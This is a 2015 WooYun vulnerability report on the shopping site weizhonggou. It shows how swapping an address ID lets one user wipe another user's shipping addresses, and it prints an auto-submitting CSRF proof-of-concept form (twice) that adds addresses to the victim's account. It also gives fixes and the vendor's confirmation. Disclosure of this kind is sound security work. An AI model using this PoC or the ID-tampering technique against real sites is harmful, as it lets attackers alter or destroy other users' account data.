当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100419

漏洞标题:微众购设置不当可导致5000+收货地址清空+csrf任意添加收货地址

相关厂商:weizhonggou

漏洞作者: 小龙

提交时间:2015-03-11 11:55

修复时间:2015-04-25 11:56

公开时间:2015-04-25 11:56

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-11: 厂商已经确认,细节仅向厂商公开
2015-03-21: 细节向核心白帽子及相关领域专家公开
2015-03-31: 细节向普通白帽子公开
2015-04-10: 细节向实习白帽子公开
2015-04-25: 细节向公众公开

简要描述:

嘿嘿

详细说明:

先用两个号
为UserA:

不中就不玩了


userB:

130****4094


我们先用userA去添加一个收货地址
然后用USERb也添加一个地址,

1.png


Userb修改的时候抓包把id改成userA的。。。
可以把这个ID取代过来,然后自动清空

2.png


看图,userA的ID是:5486
USERB开始修改,并且把ID修改为5486

3.png


4.png


还有一处csrf
新建一个poc.html

<html>
<body>
<form id="csrf" name="csrf" action="http://weizhonggou.com/member/home/useraddress" method="POST">
<input type="text" name="sheng" value="=%E4%B8%8A%E6%B5%B7%E5%B8%82" />
<input type="text" name="shi" value="%E4%B8%8A%E6%B5%B7%E5%B8%82" />
<input type="text" name="xian" value="%E9%BB%84%E6%B5%A6%E5%8C%BA" />
<input type="text" name="jiedao" value="123123" />
<input type="text" name="qqnumber" value="1231231231111" />
<input type="text" name="youbian" value="123123" />
<input type="text" name="shouhuoren" value="test" />
<input type="text" name="mobile" value="13800138011" />
<input type="text" name="submit" value="%E4%BF%9D%E5%AD%98" />
<input type="submit" value="submit">
</form>
<script>
document.csrf.submit();
</script>
</body>


访问前

5.png


6.png


7.png


漏洞证明:

先用两个号
为UserA:

不中就不玩了


userB:

130****4094


我们先用userA去添加一个收货地址
然后用USERb也添加一个地址,

1.png


Userb修改的时候抓包把id改成userA的。。。
可以把这个ID取代过来,然后自动清空

2.png


看图,userA的ID是:5486
USERB开始修改,并且把ID修改为5486

3.png


4.png


还有一处csrf
新建一个poc.html

<html>
<body>
<form id="csrf" name="csrf" action="http://weizhonggou.com/member/home/useraddress" method="POST">
<input type="text" name="sheng" value="=%E4%B8%8A%E6%B5%B7%E5%B8%82" />
<input type="text" name="shi" value="%E4%B8%8A%E6%B5%B7%E5%B8%82" />
<input type="text" name="xian" value="%E9%BB%84%E6%B5%A6%E5%8C%BA" />
<input type="text" name="jiedao" value="123123" />
<input type="text" name="qqnumber" value="1231231231111" />
<input type="text" name="youbian" value="123123" />
<input type="text" name="shouhuoren" value="test" />
<input type="text" name="mobile" value="13800138011" />
<input type="text" name="submit" value="%E4%BF%9D%E5%AD%98" />
<input type="submit" value="submit">
</form>
<script>
document.csrf.submit();
</script>
</body>


访问前

5.png


6.png


7.png


修复方案:

1:删除或者修改的时候添加验证
2:csrf可添加token来防御,厂商不懂可以来:http://drops.wooyun.org/papers/155 乌云知识库参考修复方案

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-11 17:34

厂商回复:

该入口确实存在漏洞可修改地址,但目前那个地址表已清空也没所谓,目前该处是用的提交地址表,那个表是之前的,确实存在漏洞

最新状态:

2015-03-11:该处地址是之前微众购没改过提交地址方式的地址,不直接影响现在收获地址,漏洞确实存在,但不影响提交后的收获地址。 这个地址算是提交地址的快捷选项。谢谢提交漏洞